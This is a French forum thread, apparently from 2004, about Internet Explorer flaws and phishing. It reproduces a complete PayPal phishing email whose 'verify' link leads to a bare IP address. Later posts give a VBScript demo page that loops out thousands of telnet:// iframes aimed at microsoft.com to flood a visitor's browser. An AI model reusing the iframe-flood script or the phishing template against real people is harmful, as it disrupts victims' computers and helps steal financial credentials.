Internet Explorer : une troisième faille
Internet Explorer : une troisième faille
Futura Sciences -
Contrairement à ce que certains ont pensé, la dernière mise à jour de Windows Update ne corrige pas les 2 failles dont nous avons précédemment parlé (voir notre précédent article). Toutefois un certain nombre d'antivirus semblent capables de ...
http://www.futura-sciences.com/sinformer/n/news3855.php
Contrairement à ce que certains ont pensé, la dernière mise à jour de Windows Update ne corrige pas les 2 failles dont nous avons précédemment parlé (voir notre précédent article). Toutefois un certain nombre d'antivirus semblent capables de ...
http://www.futura-sciences.com/sinformer/n/news3855.php
le message est, on ne peut plus clair...Ce type d’attaques, qui consiste à se faire passer pour un site bien connu et récupérer frauduleusement des informations que les utilisateurs donneront en toute confiance s’appelle le phishing. Certains site bien connus, comme E-bay ou Paypal risquent d’être pris pour cible (ils l’ont été dans le passé avec des techniques moins sophistiquées, mais basées sur le fait d’imiter un message authentique du site).
Il n’y a pas de parade actuelle à ce problème, sauf votre vigilance ou l’utilisation d’un navigateur basé sur un autre moteur que celui d’Internet Explorer.
il faudrait peut-être suggérer à MS de numéroter ses failles comme les évolutions de logiciels : faille 1.6.3

en leur soumettant l'éventualité de l'inutilité des points.

le phishing ?


Linux Salix OS 15.0 / Xfce 4.16
-
- Arias
- Messages : 10
- Inscription : 10 févr. 2004, 01:18
Ca me fait penser à un spam que j'ai recu un jour:
Dans ces cas la, il vaut mieux avertir payPal ou l'organisme concerné
Code : Tout sélectionner
From - Wed Feb 25 23:35:24 2004
X-UIDL: 1077748050.2800.mx1-1
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <service@paypal.com>
Delivered-To: online.fr-silkensedai@online.fr
Received: (qmail 2763 invoked from network); 25 Feb 2004 22:27:29 -0000
Received: from 68-174-151-44.nyc.rr.com (68.174.151.44)
by mx1-1.free.fr with SMTP; 25 Feb 2004 22:27:29 -0000
Received: from 192.244.59.120 by 68.174.151.44;Wed, 25 Feb 2004 17:23:25 -0500
Message-ID: <KKORSGAIKSZORBVBQFUCUVB@msn.com>
From: "service@paypal.com" <service@paypal.com>
Reply-To: "service@paypal.com" <service@paypal.com>
To: sholari@online.fr, shubcorp@online.fr, silkensedai@online.fr, siteordo@online.fr, sitepp@online.fr, smconcept@online.fr, spara@online.fr
Subject: Information Update
Date: Thu, 26 Feb 2004 03:21:25 +0500
X-Mailer: QUALCOMM Windows Eudora Version 5.1
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="--19805085275850732833"
X-Priority: 3
X-MSMail-Priority: Normal
----19805085275850732833
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable
<html>
<link rel=3D"stylesheet" type=3D"text/css" href=3D"http://www.paypal.com/c=
ss/pp_styles_ns6_111402.css">
<body bgcolor=3D"#ffffff">
<img src=3D"http://www.paypal.com/images/paypal_logo.gif">
<table cellSpacing=3D0 cellPadding=3D0 width=3D"100%" border=3D0>
<tbody>
<tr>
<td width=3D"100%" background=3D"http://www.paypal.com/images/bg_clk.gif">=
<img height=3D29 src=3D"http://www.paypal.com/images/pixel.gif" width=3D1 =
border=3D0></td></tr>
<tr>
<td><img height=3D10 src=3D"http://www.paypal.com/images/pixel.gif" width=3D=
1 border=3D0></td></tr></tbody></table>
<br>
<font class=3D"pptext">
Dear PayPal member,<br>
At PayPal, we value the trust you have placed in us by using our service t=
o conduct your transactions<br>online. Because our relationship with you i=
s financial in nature, the protection of your privacy is particularly<br>i=
mportant to us.
<br><br>
We are sending this verification notice to provide you with information ab=
out how PayPal safeguards<br>
your privacy, as well as to comply with U.S. federal privacy guidelines th=
at apply to financial institutions<br>
such as PayPal. The full terms of PayPal's privacy policy are available on=
the PayPal website, which you<br>are welcome to review at any time.
<br><br>
<b>Please verify your account and financial information by clicking on the=
link below:</b><br>
<a href=3D"http://216.12.215.202/paypal/verify/">https://www.paypal.com/cg=
i-bin/webscr?cmd=3Dverify</a>
<br><br>
<b>*** DO NOT REPLY TO THIS EMAIL ***</b>
</font>
<br><br><br>
<center>
Copyright=A9 2003 PayPal, Inc. All rights reserved. Designated trademarks =
and brands are the property<br>of their respective owners.
</center>
</body>
</html>
----19805085275850732833--
il vaut mieux ne pas utiliser un reply, dans aucune adresse d'un mail soupçonné de junk.
va sur le site de ripe, apnic, etc... (selon la zone web) pour le whois de paypal.com ou de l'autre boîte : tu auras l'adresse de l'abuse... tu envoies ta requête avec le junked mail.
va sur le site de ripe, apnic, etc... (selon la zone web) pour le whois de paypal.com ou de l'autre boîte : tu auras l'adresse de l'abuse... tu envoies ta requête avec le junked mail.
Linux Salix OS 15.0 / Xfce 4.16
J'ajouterais, pour rester dans le sujet du fil, que les "experts" s'y mettent aussi :
Source : http://www.clubic.com/n/n13168.html
Source : http://www.clubic.com/n/n13168.html
...Cette affaire a été la goutte d'eau qui a fait déborder le vase pour certains experts. A tel point que certains organismes dédiés à la sécurité comme l'US-CERT (US Computer Emergency Readiness Team) donne un conseil sans équivoque : "Use a different web browser" (utilisez un autre navigateur)....
Je rajouterais :olab a écrit :J'ajouterais, pour rester dans le sujet du fil, que les "experts" s'y mettent aussi :
http://www.pcinpact.com/actu/news/La_US ... plorer.htm
http://www.materiel.be/news/5825/#0
Et je suis agréablement surpris de voir dans les commentaires de moins en moins de messages anti Mozilla

Butineur, blog sur Mozilla, Firefox et les idées libres.. "Troll du soir, espoir ..."
Ptite demo :
(a essayer que si vous êtes maso, ca ouvre 8 000 fenetres telnet vers mirososft.com)
http://dejean.benoit.free.fr/img/bass_fishin.gif

(a essayer que si vous êtes maso, ca ouvre 8 000 fenetres telnet vers mirososft.com)
http://dejean.benoit.free.fr/img/bass_fishin.gif

j'ai essayer cela, marant;) En tout cas je préfére la version firefox;)XF007 a écrit :Ptite demo :
(a essayer que si vous êtes maso, ca ouvre 8 000 fenetres telnet vers mirososft.com)
http://dejean.benoit.free.fr/img/bass_fishin.gif
Le seul truc que je me demande c'est si on peux en plus cacher la fenetre et passer des argument...
le code c'est ca :
Donc je ne pense pas qu'on puisse lancer n'importe quel prog ...
Seulement ceux qui sont associés a un protocole
Code : Tout sélectionner
<html>
<body>
<H1> netric 0wnz y00! </H1>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
</body>
</html>
Seulement ceux qui sont associés a un protocole
Qui est en ligne ?
Utilisateurs parcourant ce forum : Aucun utilisateur inscrit et 1 invité